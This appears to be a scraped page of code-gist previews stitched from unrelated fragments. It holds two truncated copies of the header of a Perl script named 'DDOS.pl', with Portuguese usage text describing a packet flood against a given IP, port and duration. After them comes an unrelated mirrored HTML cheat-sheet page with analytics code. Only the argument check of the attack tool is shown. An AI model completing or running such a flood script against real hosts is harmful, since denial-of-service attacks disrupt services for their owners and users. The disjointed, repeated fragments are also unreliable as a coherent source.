This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use Socket; | |
| use strict; | |
| if ($#ARGV != 3) { | |
| print "Dra DDOS.pl <ip> <port> <size> <time>. \n"; | |
| print "Ataque na porta 80. \n"; | |
| print "Ataque com 1024 Pacotes. \n"; | |
| print "Ataque Com Tempo Infinito. = 0 \n"; | |
| exit(1); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| use Socket; | |
| use strict; | |
| if ($#ARGV != 3) { | |
| print "Dra DDOS.pl <ip> <port> <size> <time>. \n"; | |
| print "Ataque na porta 80. \n"; | |
| print "Ataque com 1024 Pacotes. \n"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html lang="en-US" prefix="og: http://ogp.me/ns#"> | |
| <!-- Mirrored from runeforge.gg/cheat-sheet/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 13 Nov 2017 22:48:46 GMT --> | |
| <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack --> | |
| <head> | |
| <script> | |
| window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; | |
| ga('create', 'UA-109324552-1', 'auto'); | |
| ga('send', 'pageview'); |